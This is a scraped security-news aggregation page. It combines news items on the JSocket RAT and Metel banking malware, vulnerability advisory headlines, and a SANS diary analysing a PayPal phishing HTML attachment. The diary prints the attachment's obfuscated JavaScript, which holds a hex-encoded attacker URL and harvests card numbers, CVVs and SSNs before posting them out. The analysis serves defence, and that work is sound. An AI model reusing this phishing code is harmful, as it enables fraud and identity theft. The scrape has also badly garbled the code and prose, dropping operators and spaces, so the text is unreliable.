Hackin9
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 

The JSocket website: open for business on the open Web (at least right now). (credit: Sean Gallagher)

A family of Java-based malware that has given attackers a backdoor into Windows, Linux, Mac OS X, and Android devices since 2013 has risen from the dead once again as a "commercial" backdoor-as-a-service. It was recently detected in an attack on a Singapore bank employee. Previously known as AlienSpy or Adawind, the malware was all but shut down in 2015 after the domains associated with its command and control network were suspended by GoDaddy. But according to Vitaly Kamluk, the director of Kaspersky Lab's Asia/Pacific research and analysis team, the malware has been modified, rebranded, and is open for service again to customers ranging from Nigerian scam operators to possible nation-state actors. Ars has confirmed that the service is offered openly through a website on the public Internet.

AlienSpy was found last spring on the Android phone of Alberto Nisman, the Argentinian prosecutor who died under suspicious circumstances just as he was apparently about to deliver a report implicating the Argentine government in the bombing of a Buenos Aires Jewish community center in 1994. Now resurrected under the names JSocket and jRat, according to a presentation by Kamluk at the Kaspersky Security Analyst Summit 2016 in Tenerife, the malware is available through an open website to subscribers at prices ranging from $30 for one month to $200 for an unlimited license. Kamluk believes the service's author is a native Spanish speaker, possibly based out of Mexico.

JSocket includes a number of typical "RAT" (remote access tool) capabilities, including video capture from webcams, audio capture from microphones, the ability to detect antivirus software on a system, a keylogger to record key strokes, and a virtual private network key-stealing feature that could be used to gain access to any of the VPNs used by the victim. Kaspersky has tracked more than 150 attack campaigns against more than 60,000 targets with the latest iterations of the malware, with Nigerian e-mail-based scam operations (particularly those targeting banks) being the biggest adopters of the tool. The lion's share of the remaining subscribers to the malware appeared to come from the US, Canada, Russia, and Turkey.

Read on Ars Technica | Comments

 
Guest blog post by Willie May, Under Secretary of Commerce for Standards and Technology and NIST Director.Strong cybersecurity starts at the top. FRONT ROW (from left to right): Ike Leggett, Montgomery County Executive Maryland Lt ...
 

(credit: Tax Credits)

To appreciate how malware targeting banks and other financial institutions is adopting sophisticated techniques once reserved for state-sponsored spies using so-called advanced persistent threats, consider the recently discovered Metel crimeware package.

It contains more than 30 separate modules that can be tailored to the computer it's infecting. One of the most powerful components automatically rolls back ATM transactions shortly after they're made. As a result, people with payment cards from a compromised bank can withdraw nearly unlimited sums of money from ATMs belonging to another bank. Because the Metel module repeatedly resets card balances, the criminals never pass the threshold that would normally freeze the card. Last year, the rollback scheme caused an unnamed bank in Russia to lose millions of rubles in a single night.

Metel usually gains an initial foothold by exploiting vulnerabilities in browsers or through spear phishing e-mails that trick employees to execute malicious files. Members of the Metel hacking gang then use legitimate software used by server administrators and security researchers to compromise other PCs in an attempt to further burrow into the targeted network. They will often patiently work this way until they gain control over a system with access to money transactions, for example, PCs used by call center operators or IT support.

Read 5 remaining paragraphs | Comments

 

Monday Morning Quarterbacking Super Bowl 50: Infosec Edition
Dark Reading
So, while on Sunday you may have been absorbed in the unstoppable Von Miller or the hapless Cam Newton, now that it's in the books you can take a few moments to let a few of these infosec football analogies percolate in your subconscious. You might ...

and more »
 

CSO Online

What to love about your IT security job
CSO Online
Security practices may not top the “what I love about my job” list for the everyday employee, but for those working in the InfoSec industry, it's a different story. Between the thrill of building systems to protect data and keeping up with an ever ...

 
WordPress WP User Frontend Plugin [Unrestricted File Upload]
 
WordPress WooCommerce - Store Toolkit Plugin [Privilege Escalation]
 
PressePortal NewsAktuell (DPA) - Multiple Vulnerabilities
 
Ebay Inc (Pages) - Client Side Cross Site Scripting Vulnerabilities
 
Alsovalue CMS 2016Q1 - SQL Injection Web Vulnerability
 
JavaScript Anywhere v3.0.4 iOS - Persistent Vulnerability
 
Local Microsoft Windows 7 / 8 / 10 Buffer Overflow via Third-Party USB-Driver (ser2co64.sys)
 
Getdpd BB #5 - Persistent Filename Vulnerability
 
Symphony CMS multiple vulnerabilities
 
Executable installers are vulnerable^WEVIL (case 25): WinRAR's installer and self-extractors allow arbitrary (remote) code execution and escalation of privilege
 
WordPress User Meta Manager Plugin [Information Disclosure]
 

ay, I found an interesting phishing email. Nothing fancy or exotic about the content, just a classic email notification pretending to be sent byPaypaland asking the victim to urgently review and update his/her personal settings. The message was clever enough to not trigger anti-spam rules. The SpamAssassin">The attached file is just simple a regular HTML file containing some obfuscated JavaScript code.This pagewas unknown to VT when I checked it. Here is a dump of the JavaScript code"> function wp_plugin(r) { var e, n, i, t, a, d, o, f, h = ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=, c = 0, C = 0, g = , r += do t = h.indexOf(r.charAt(c++)), a = h.indexOf(r.charAt(c++)), d = h.indexOf(r.charAt(c++)), o = h.indexOf(r.charAt(c++)), f = t 18 | a 12 | d 6 | o, e = f 16 255, n = f 8 255, i = 255 f, while (c return g = x.join(), g.replace(/\0+$/, )}function GoogleAnalytics(r, o) { 256 256 for (var t = f return t}var GA_PLUGIN = .....redacted.....var _0xbf60 = [GA-ID18998, \x77\x72\x69\x74\x65">A first analyze shows that functions are named with common strings for websites (Wordpress,Google Analytics). No suspicious string is present in the code that could trigger a security control.The variable GA_PLUGIN contains ~23KB of data (thathave been removed in this post)that looks immediately to beBASE64 encoded. Acopy of the original HTML file is available hereif you">GA_PLUGIN is used by wp_plugin() which is a BASE64 decoder function. Lets decode it manually and we obtain a binary file without any interesting patterns / strings in it. The binary content is passed to the GoogleAnalytics() function with a second parameter (the key). I tried a simple XOR but it failed. The function beingavailable in the code, I did not loose my time andjust executed it in a sandbox to get the decoded data which is thecomplete HTML page that is finally displayedit in the browser via the last line (_0xbf60[1] = write">Here again, the decoded HTML page contains a second layer of obfuscation with more JavaScript code. When the victim clicks on Submit Form, data are not posted directly to a remote server but the xsub() function is called. The arrays contain just strings in hexadecimal encoding, nothing fancy."> var _0x22eb9a = c113b797cd0456be0d1a9c2f35f7d78b.phpvar _0x2da3 = [\x6C\x65\x6E\x67\x74\x68, \x63\x68\x61\x72\x41\x74, \x68\x74\x74\x70\x3A\x2F\x2F\x74\x31\x2E\x73\x79\x73\x74\x65\x6D\x66\x69\x6C\x74\x65\x72\x73\x2E\x6E\x65\x74\x2F, \x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x70\x61\x79\x70\x61\x6C\x2E\x63\x6F\x6D\x2F, \x72\x65\x70\x6C\x61\x63\x65, \x6C\x6F\x63\x61\x74\x69\x6F\x6E, \x61\x63\x74\x69\x6F\x6E, \x65\x6E\x76, \x66\x6F\x72\x6D\x73, \x6D\x65\x74\x68\x6F\x64, \x70\x6F\x73\x74, \x73\x75\x62\x6D\x69\x74var _0x27ca82 = (function(_0xe689x2) { return function(_0xe689x3) { var _0xe689x4 = _0xe689x3[_0x2da3[0]], _0xe689x5 = 1, _0xe689x6 = 0, while (_0xe689x4) { _0xe689x6 += (_0xe689x5 ^= 1) ? _0xe689x2[_0xe689x7] : _0xe689x7 return _0xe689x6 _0xe689x6 % 10 === 0 }function xsub() { if (!_0x11e97d()) { return false if (!_0xbbd7eb) { _0x98a278 += _0x22eb9a document[_0x2da3[8]][_0x2da3[7]][_0x2da3[11]]()}var _0x9939 = [\x76\x61\x6C\x75\x65, \x63\x63\x61\x72\x64\x6E\x75\x6D, \x65\x6E\x76, \x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x70\x61\x79\x70\x61\x6C\x2E\x63\x6F\x6D\x2F, \x72\x65\x70\x6C\x61\x63\x65, \x6C\x6F\x63\x61\x74\x69\x6F\x6E, \x63\x61\x64\x64\x72, \x63\x65\x78\x70\x6D, \x63\x65\x78\x70\x79, \x63\x63\x76\x76, \x6E\x61\x6D\x65, \x30\x30, \x63\x73\x73\x6E, \x6C\x65\x6E\x67\x74\x68, \x2D, \x69\x6E\x64\x65\x78\x4F\x66, \x55\x6E\x69\x74\x65\x64\x20\x53\x74\x61\x74\x65\x73, \x63\x63\x6F\x75\x6E\x74\x72\x79, \x63\x7A\x69\x70function _0x11e97d() { if (!ax) { return window[_0x9939[5]][_0x9939[4]](_0x9939[3]), !1 var _0x88a0x2 = document[_0x9939[2]][_0x9939[6]][_0x9939[0]], _0x88a0x3 = document[_0x9939[2]][_0x9939[7]][_0x9939[0]], _0x88a0x4 = document[_0x9939[2]][_0x9939[8]][_0x9939[0]], if (!document[_0x9939[2]][_0x9939[10]][_0x9939[0]] || !_0x88a0x2 || !_0x88a0x5 || _0x9939[11] == _0x88a0x3 || _0x9939[11] == _0x88a0x4) { return window[_0x9939[5]][_0x9939[4]](_0x9939[3]), !1 - 1 != _0x88a0x2[_0x9939[15]](_0x9939[14]) if (_0x9939[16] == document[_0x9939[2]][_0x9939[17]][_0x9939[0]]) { if (0 _0x88a0x3 _0x88a0x3 != _0x88a0x4) { return window[_0x9939[5]][_0x9939[4]](_0x9939[3]), !1 if (0 _0x88a0x2 5 != _0x88a0x2) { return window[_0x9939[5]][_0x9939[4]](_0x9939[3]), !1 } return !0">The interesting line is the first one which contains the PHP page where data are posted. If you browse the code, you see that it is appended to _0x2da3[2]">to\x68\x74\x74\x70\x3A\x2F\x2F\x74\x31\x2E\x73\x79\x73\x74\x65\x6D\x66\x69\x6C\x74\x65\x72\x73\x2E\x6E\x65\x74\x2F">Another interesting function is _0x11e97d() which performs multiple checks againstthe data submitted by the victim. Indeed, the attacker took the time to validate the data passed via the form. If one of them does not match the requirements, nothing is sent to the malicious server and just a redirect occurs.Example: The credit card number and SSNare checked (via the function _0x27ca82()).To successfully submit my test data, I bypassed _0x11e97d() with a simple return 1">In this phishing campaign, victims from theUnited States are targeted because a real SSN is mandatory. It also demonstrates that the attacker took extra careto validate the data to get only valid information sent to him.This is a nice example of multiple obfuscation levels, nothing is downloaded from the Internet, the user has just to execute the HTML file attached to the email.

Xavier Mertens
ISC Handler - Freelance Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Multiple vulnerabilities in Open Real Estate v 1.15.1
 
[SECURITY] [DSA 3467-1] tiff security update
 
[SECURITY] [DSA 3468-1] polarssl security update
 
CFP: SIN 2016 - 9th International Conference on Security of Information and Networks
 
[security bulletin] HPSBHF03431 rev.2 - HPE Network Switches, local Bypass of Security Restrictions, Indirect Vulnerabilities
 
[security bulletin] HPSBGN03434 rev.1 - HP Continuous Delivery Automation using Java Deserialization, Remote Arbitrary Code Execution
 
[CVE-2016-0602, CVE-2016-0603] Executable installers are vulnerable^WEVIL (case 24): Oracle Java 6/7/8 SE and VirtualBox
 
Internet Storm Center Infocon Status